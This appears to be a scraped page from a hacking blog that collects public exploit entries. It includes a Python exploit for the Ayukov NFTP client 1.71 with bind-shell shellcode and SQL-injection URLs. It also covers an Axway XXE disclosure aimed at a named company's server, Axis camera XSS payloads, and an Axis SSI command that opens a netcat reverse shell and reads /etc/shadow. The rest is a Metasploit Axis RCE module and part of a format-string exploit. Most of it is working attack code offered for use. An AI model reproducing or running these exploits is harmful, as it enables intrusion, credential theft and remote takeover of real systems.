# Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
# Date: 2019-11-03
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
# Version: 1.71
# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
# Steps to reproduce:
# Run the server with the valid Windows version
# Connect the client to the malicious server
# bind shell on port 5150
#!/usr/bin/env python2
import os, sys, socket
NARGS = len(sys.argv)
# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# 7C923A95 FFD6 CALL ESI # Windows XP Pro SP3; ntdll.dll
# 7C927543 FFD6 CALL ESI # Windows XP Pro SP2; ntdll.dll
# 77E641C7 FFE6 JMP ESI # Windows XP Pro SP1; kernel32.dll
# 77E667F3 FFE6 JMP ESI # Windows XP Pro SP0: kernel32.dll
tourRETs = {
"XPProSP3": "\x95\x3A\x92\x7c",
"XPProSP2": "\x43\x75\x92\x7C",
"XPProSP1": "\xc7\x41\xe6\x77",
"XPProSP0": "\xf3\x67\xe6\x77"
}
if not NARGS > 1:
print("USAGE: %s version" % sys.argv[0])
print("[.] version must be in:")
for item in tourRETs:
print("\t%s" % item)
sys.exit(1)
# sploit = "A"*5000 # crash! in SYST cmd, 41414141 in EIP and EBP
# ESP and ESI both pointers to somewhere in the As
# If I increase the overflow string to 10000, the area ESP points to at crash
#, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.
# sploit = "A"*10000
# sploit = sys.argv[1] # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP
# `locate pattern_offset.rb |head -n 1` 46326846 10000 # 4116
sploit = "A"*4116
# Add the return address
try:
sploit += tourRETs[sys.argv[1]]
except KeyError, x:
print("[!] Version %s: not a valid version! Possibly bad capitalization" % str(x))
sys.exit(1)
sploit += ("\x90"*12) # original calcs based on RET*4... oops. realign.
# echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc # 0x69D (1693); ESP-ESI
sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs
# badchars = "\x00\x0a\x0d"
# locate EIP and align ESP to a close future 4 and 16 byte boundary
NOTES = """\
$-37 > D9EE FLDZ
$-35 > D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
$-31 > 59 POP ECX
$-30 > 80C1 09 ADD CL,9
$-2D > 80C1 04 ADD CL,4
$-2A > 80C1 2A ADD CL,2A
$-27 > 80C5 01 ADD CH,1
$-24 > 51 PUSH ECX
$-23 > 5C POP ESP
"""
sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes
sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes
sploit += "\x90" * 0x22 # ESP = EIP
sploit += "\x90" * 20 # sled for shikata_ga_nai unpack
# msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process
# -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c
sploit += (
"\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1"
"\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57"
"\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56"
"\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79"
"\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3"
"\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa"
"\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9"
"\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82"
"\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05"
"\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8"
"\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74"
"\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68"
"\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02"
"\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde"
"\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4"
"\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba"
"\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f"
"\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83"
"\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07"
"\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51"
"\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb"
"\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4"
"\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04"
) # 355
sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)
cases = {
"USER": "331 user OK. Pass required",
"PASS": "230 OK, current directory is /",
# "SYST": "215 UNIX Type: L8",
"SYST": sploit, # CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP
"TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",
"SITE UMASK": "500 SITE UMASK is an unknown extension",
"CWD": "250 OK, current directory whatever you think it is",
"PORT": "200 PORT command successful",
"PASV": "227 Entering PASV mode",
"LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"
}
sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sx.bind(("192.168.56.181",21))
sx.listen(5)
print("[.] Standing up HostileFTPd v0.0 alpha, port 21")
cx,addr = sx.accept()
print("[!] Connection received from %s" % str(addr))
cx.send("220 HostileFTPd v0.0 alpha !\r\n")
notified = 0
while True:
req = cx.recv(1024)
for key, resp in cases.items():
if key in req:
cx.send(resp + "\r\n")
if "SITE UMASK" in req and notified == 0:
print("[!] Buffer sent. Bind shell on client's port 5150?")
notified = 1
if "PASV" in req:
justpause = raw_input("[.] PASV received. Pausing recv buffer")
NOTES="""\
### followed TCP stream in normal client connect to ftp server
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 13:47. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
USER bozo
331 User bozo OK. Password required
PASS theclown
230-User bozo has group access to: 1003
230 OK. Current directory is /
SYST
215 UNIX Type: L8
TYPE I
200 TYPE is now 8-bit binary
SITE UMASK 022
500 SITE UMASK is an unknown extension
CWD /
250 OK. Current directory is /
PASV
227 Entering Passive Mode (192,168,56,181,183,29)
LIST -a
150 Accepted data connection
226-ASCII
226-Options: -a -l
226 3 matches total
"""
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863118013
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/49668/info
Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/v1/urundetay.asp?id=21%28%29
http://www.example.com/v1/default.asp?getir=urunler&id=39%28%29
http://www.example.com/v1/linkler.asp?id=2%28%29
http://www.example.com/detay.asp?ilanid=8%28%29 [SQL]
http://www.example.com/kategoriler.asp?id=4%28%29 [SQL]
http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL]
http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin
# Title: Axway SecureTransport 5 - Unauthenticated XML Injection
# Google Dork: intitle:"Axway SecureTransport" "Login"
# Date: 2019-07-20
# Author: Dominik Penner / zer0pwn of Underdog Security
# Vendor Homepage: https://www.axway.com/en
# Software Link: https://docs.axway.com/bundle/SecureTransport_54_AdministratorGuide_allOS_en_HTML5/page/Content/AdministratorsGuide/overview/overview.htm
# Version: 5.x
# CVE: N/A
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
ATTENTION:
this is a friendly neighborhood zeroday drop
"Axway SecureTransport is a multi-protocol MFT gateway for securing, managing, and tracking file flows among people and applications inside your enterprise, and beyond your firewall to your user communities, the cloud and mobile devices. It is designed to handle everything — from high-volume automated high speed secure file transfers between systems, sites, lines of business and external partners, to user-driven communications and mobile, folder- and portal-based file sharing."
Who uses this software?
Well, to name a few... (just use the dork dude)
- Government of California
- Biometrics.mil
- Fleetcor
- Costco
- Boeing
- IRS
Description:
Axway SecureTransport versions 5.3 through 5.0 (and potentially others) are vulnerable to an unauthenticated blind XML injection (& XXE) vulnerability in the resetPassword functionality via the REST API. If executed properly, this vulnerablity can lead to local file disclosure, DOS or URI invocation attacks (e.g SSRF->RCE). It's worth noting that in version 5.4 the v1 API was deprecated... but not removed entirely. Meaning that you can still trigger this vulnerability on updated installations if they have the v1.0, v1.1, v1.2 or v1.3 in the /api/ directory.
Reproduction:
1. Breaking the parser.
HTTP Request:
```
POST /api/v1.0/myself/resetPassword HTTP/1.1
Host: securefile.costco.com
Content-Type: application/xml
Referer: localhost
</email>
```
HTTP Response:
```
{
"message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 2; The markup in the document preceding the root element must be well-formed.]"
}
```
2. Verifying the vulnerability.
HTTP Request:
```
POST /api/v1.0/myself/resetPassword HTTP/1.1
Host: securefile.costco.com
Content-Type: application/xml
Referer: localhost
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE resetPassword [
<!ENTITY thisactuallyexists SYSTEM "file:///dev/null">
]>
<resetPassword><email>&thisactuallyexists;&thisdoesnt;</email></resetPassword>
```
HTTP Response:
```
{
"message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 5; columnNumber: 48; The entity "thisdoesnt" was referenced, but not declared.]"
}
```
As you can see, the parser recognizes that "thisactuallyexists" was in fact declared. In the same error, we see that "thisdoesn't" was referenced, but not declared. This demonstrates that we can declare arbitrary entities.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#detect-the-vulnerability
3. External Entity Injection (XXE) (hardened)
NOTE: Because the server doesn't reflect the input anywhere, our only option is error-based XXE or out-of-band XXE. However, upon initial discovery, it appears as though most Axway SecureTransport installations have some type of firewall blocking all outgoing requests. This makes exploiting traditional XXE difficult. Judging by this, my only ideas on exploitation would be via blind SSRF or by repurposing an existing DTD on the filesystem to trigger an error with the file contents/result of our payload. However because I don't have a license, I can't effectively audit this software from a whitebox perspective, which makes mapping out internal attack surface difficult. The underlying vulnerability remains... but with restrictions.
HTTP Request:
```
POST /api/v1.0/myself/resetPassword HTTP/1.1
Host: securefile.costco.com
Content-Type: application/xml
Referer: localhost
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE resetPassword [
<!ENTITY ssrf SYSTEM "http://localhost/SOMETHING_I_WISH_I_KNEW_EXISTED?NEW_PASSWORD=1337" >
]>
<resetPassword><email>&ssrf;</email></resetPassword>
```
HTTP Response:
```
(empty)
```
Local DTD repurposing example request:
```
POST /api/v1.0/myself/resetPassword HTTP/1.1
Host: securefile.costco.com
Content-Type: application/xml
Referer: localhost
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE resetPassword [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % expr 'aaa)>
<!ENTITY % file SYSTEM "file:///FILE_TO_READ">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///abcxyz/%file;'>">
%eval;
%error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<resetPassword></resetPassword>
```
4. More vulnerability-indicating errors:
HTTP Request:
```
POST /api/v1.0/myself/resetPassword HTTP/1.1
Host: securefile.costco.com
Content-Type: application/xml
Referer: localhost
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE resetPassword [
<!ENTITY ssrf SYSTEM a >
]>
<resetPassword><email>&ssrf;</email></resetPassword>
```
HTTP Response:
```
{
"message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 3; columnNumber: 22; The system identifier must begin with either a single or double quote character.]"
}
```
5. The original request
HTTP Request:
```
POST /api/v1.0/myself/resetPassword HTTP/1.1
Host: securefile.costco.com
Content-Type: application/xml
Referer: localhost
<resetPassword><email>email@email.com</email></resetPassword>
```
HTTP Response:
```
(empty)
```
Conclusion:
If a determined attacker were to get to know the Axway SecureTransport software, the chances of successfully chaining this bug are high. DTD repurposing is a relatively new technique, however in the near future we will be seeing a lot more of this attack vector due to XML parser restrictions/firewalled networks. I didn't feel comfortable doing further testing as I don't have a license, meaning I'm limited to testing against live targets. So for now, enjoy the 0day. Be creative.
Remediation:
In order to avoid this vulnerability, it's suggested to disable both doctype declaration and external general entities. You can find more information on that here: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java
Notes:
- Referer must be set.
- Content type must be xml.
- Successful request returns a HTTP/1.1 204 No Content
- Any type of invalid XML throws an SAXParser exception.
- If external entities were disabled... we should also recieve an exception.
- Same with doctype declaration.
- API endpoints can vary from /api/v1.0, /api/v1.1, /api/v1.2, /api/v1.3, /api/v1.4
References:
https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
https://gist.github.com/marcwickenden/acd0b23953b52e7c1a1a90925862d8e2
https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
source: https://www.securityfocus.com/bid/55589/info
AxisInternet VoIP Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
AxisInternet VoIP Manager 2.1.5.7 is vulnerable; other versions may also be affected.
https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=%22%3 %3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&department_match=1&action=Select
https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&firstname_match=1&department=&department_match=1&action=Select
https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&;lastname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select
https://www.example.com/asterisk/contact_chooser.cgi?contact=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C
https://www.example.com/asterisk/contacts.cgi?type=2&usr=demo-100&managed_usr=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select+
[STX]
Subject: SSI Remote Execute and Read Files
Researcher: bashis <mcw noemail eu> (August 2016)
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Conditions: The cam must be configure to allow anonymous view
Execute remote commands (PoC: Connect back shell):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<CONNECT BACK IP> = LHOST IP
<CONNECT BACK PORT> = LHOST PORT
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT
Read remote files (PoC: Read /etc/shadow - check top of the returned output):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT
[ETX]
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __| 6079 Smith W
| (_) | | \ V V / __/ | | | (_| | |_) \__ \ doubleplusungood
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/ owning some telescreens...
Security Adivisory
2016-04-09
www.orwelllabs.com
twt:@orwelllabs
I. ADVISORY INFORMATION
-----------------------
Title: Axis Network Cameras Multiple Cross-site scripting
Vendor: Axis Communications
Class: Improper Input Validation [CWE-20]
CVE Name: CVE-2015-8256
Remotely Exploitable: Yes
Locally Exploitable: No
OLSA-ID: OLSA-2015-8256
Adivisory URL:
http://www.orwelllabs.com/2016/01/axis-network-cameras-multiple-cross.html
II. Background
--------------
Axis is the market leader in network video, invented the world’s first
network camera back in 1996 and we’ve been innovators in video surveillance
ever since. Axis network video products are installed in public places and
areas such as retail chains, airports, trains, motorways, universities,
prisons, casinos and banks.
III. vulnerability
------------------
AXIS Network Cameras are prone to multiple (stored/reflected) cross-site
scripting vulnerability.
IV. technical details
---------------------
These attack vectors allow you to execute an arbitrary javascript code in
the user browser (session) with this steps:
# 1 Attacker injects a javascript payload in the vulnerable page:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script
type="text/javascript>prompt("AXIS_PASSWORD:")</script>
This will create a entry in the genneral log file (/var/log/messages) So,
when the user is viewing the log 'system options' -> 'support' -> 'Logs &
Reports':
http://{axishost}/axis-cgi/admin/systemlog.cgi?id
will be displayed a prompt for the password of the current user
('AXIS_PASSWORD').
However, due to CSRF presented is even possible to perform all actions
already presented: create, edit and remove users and applications, etc. For
example, to delete an application "axis_update" via SXSS:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http://
axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script>
* A reflected cross-site scripting affects all models of AXIS devices on
the same parameter:
http://
{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--
# Other Vectors
http://
{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E
http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs"
onerror=alert(7) /><!--
http://
{axishost}/admin-bin/editcgi.cgi?file=<script>alert('SmithW')</script>
http://
{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E
http://
{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>
# SCRIPTPATHS:
{HTMLROOT}/showReport.shtml
{HTMLROOT}/config.shtml
{HTMLROOT}/incl/top_incl.shtml
{HTMLROOT}/incl/popup_header.shtml
{HTMLROOT}/incl/page_header.shtml
{HTMLROOT}/incl/top_incl_popup.shtml
{HTMLROOT}/viewAreas.shtml
{HTMLROOT}/vmd.shtml
{HTMLROOT}/custom_whiteBalance.shtml
{HTMLROOT}/playWindow.shtml
{HTMLROOT}/incl/ptz_incl.shtml
{HTMLROOT}/view.shtml
{HTMLROOT}/streampreview.shtml
And many, many others...
V. Impact
---------
allows to run arbitrary code on a victim's browser and computer if combined
with another flaws in the same devices.
VI. Affected products
---------------------
Multiple Axis Network products.
VII. solution
-------------
It was not provided any solution to the problem.
VIII. Credits
-------------
The vulnerability has been discovered by SmithW from OrwellLabs
IX. Legal Notices
-----------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
X. Vendor solutions and workarounds
-----------------------------------
There was no response from the vendor.
About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in embedded
device & webapp hacking.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
#include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Axis Network Camera .srv to parhand RCE',
'Description' => %q{
This module exploits an auth bypass in .srv functionality and a
command injection in parhand to execute code as the root user.
},
'Author' => [
'Or Peles', # Vulnerability discovery (VDOO)
'wvu', # Metasploit module
'sinn3r', # Metasploit module
'Brent Cook', # Metasploit module
'Jacob Robles', # Metasploit module
'Matthew Kienow', # Metasploit module
'Shelby Pace', # Metasploit module
'Chris Lee', # Metasploit module
'Cale Black' # Metasploit module
],
'References' => [
['CVE', '2018-10660'],
['CVE', '2018-10661'],
['CVE', '2018-10662'],
['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
],
'DisclosureDate' => 'Jun 18 2018',
'License' => MSF_LICENSE,
'Platform' => ['unix'],# 'linux'],
'Arch' => [ARCH_CMD],# ARCH_ARMLE],
'Privileged' => true,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'Payload' => {
'BadChars' => ' ',
'Encoder' => 'cmd/ifs',
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'}
}
],
=begin
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Type' => :linux_dropper
]
=end
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'}
))
end
def exploit
case target['Type']
when :unix_memory
execute_command(payload.encoded)
=begin
when :linux_dropper
execute_cmdstager
=end
end
end
def execute_command(cmd, opts = {})
rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
send_request_cgi(
'method' => 'POST',
'uri' => "/index.html/#{rand_srv}",
'vars_post' => {
'action' => 'dbus',
'args' => dbus_send(
method: :set_param,
param: "string:root.Time.DST.Enabled string:;#{cmd};"
)
}
)
send_request_cgi(
'method' => 'POST',
'uri' => "/index.html/#{rand_srv}",
'vars_post' => {
'action' => 'dbus',
'args' => dbus_send(method: :synch_params)
}
)
end
def dbus_send(method:, param: nil)
args = '--system --dest=com.axis.PolicyKitParhand ' \
'--type=method_call /com/axis/PolicyKitParhand '
args <<
case method
when :set_param
"com.axis.PolicyKitParhand.SetParameter #{param}"
when :synch_params
'com.axis.PolicyKitParhand.SynchParameters'
end
args
end
end
source: https://www.securityfocus.com/bid/50968/info
Axis M10 Series Network Cameras are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Axis M1054 firmware 5.21 is vulnerable; other version may also be affected.
http://www.example.com/admin/showReport.shtml?content=serverreport.cgi&pageTitle=%3C%2Ftitle%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3B%3C%2Fscript%3E%3Ctitle%3E
#!/usr/bin/env python2.7
#
# [SOF]
#
# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon
# Research and development by bashis <mcw noemail eu> 2016
#
# This format string vulnerability has following characteristic:
# - Heap Based (Exploiting string located on the heap)
# - Blind Attack (No output the remote attacker)(*)
# - Remotly exploitable (As anonymous, no credentials needed)
#
# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.
#
# This exploit has following characteristic:
# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]
# - Modifying LHOST/LPORT in shellcode on the fly
# - Manual exploiting of remote targets
# - Simple HTTPS support
# - Basic Authorization support (not needed for this exploit)
# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode
# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)
# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root
# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)
# - Multiple FMS exploit techniques
# - "One-Write-Where-And-What" for MIPS and CRISv32
# Using "Old Style" POP's
# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call
# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.
# - "Two-Write-Where-And-What" for ARM
# 1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address
# 2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New Style" (<5.40.x) direct parameter access for POP/Write
# [Big differnce in possibilities between "Old Style" and "New Style", pretty interesting actually]
# - Another way to POP with "Old Style", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x)
# - Exploit is quite well documented
#
# Anyhow,
# Everything started from this simple remote request:
#
# ---
# $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80
# HTTP/1.1 500 Server Error
# Content-Type: text/html; charset=ISO-8859-1
#
# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD>
# <BODY><H1>500 Server Error</H1>
# The server encountered an internal error and could not complete your request.
# </BODY></HTML>
# ---
#
# Which gave this output in /var/log/messages on the remote device:
#
# ---
# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10
# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.
# ---
#
# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products
#
# ---
# $ netcat -vvlp 31337
# listening on [any] 31337 ...
# 192.168.0.90: inverse host lookup failed: Unknown host
# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)
# pwd
# /usr/html
# ---
#
# Some technical notes:
#
# 1. Direct addressing with %<argument>$%n is "delayed", and comes in force only after disconnect.
# Old metod with POP's coming into force instantly
#
# 2. Argument "0" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's)
# - Would be interesting to investigate why.
#
# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26
# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff
#
# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff
# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f
#
# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:
# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)
#
# 4. Everything is randomized, except heap.
#
# 5. My initial attempts to use ROP's was not good, as I didn't want to create
# one unique FMS key by testing each single firmware version, and using ROP with FMS
# on heap seems pretty complicated as there is one jump availible, maximum two.
#
# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case.
#
# 6. Encoded and Decoded shellcode located in .bss section.
# 6.1 FMS excecuted on heap
#
# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM
# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,
# so execute shellcode on heap/stack may be impossible.
# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,
# and re-compile of the image.
# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.
#
# 8. This exploit are pretty well documented, more details can be extracted by reading
# the code and comments.
#
# MIPS ssid maps
# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid
# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid
# 0041e000-00445000 rwxp 00000000 00:00 0 [heap]
#
# ARM ssid maps
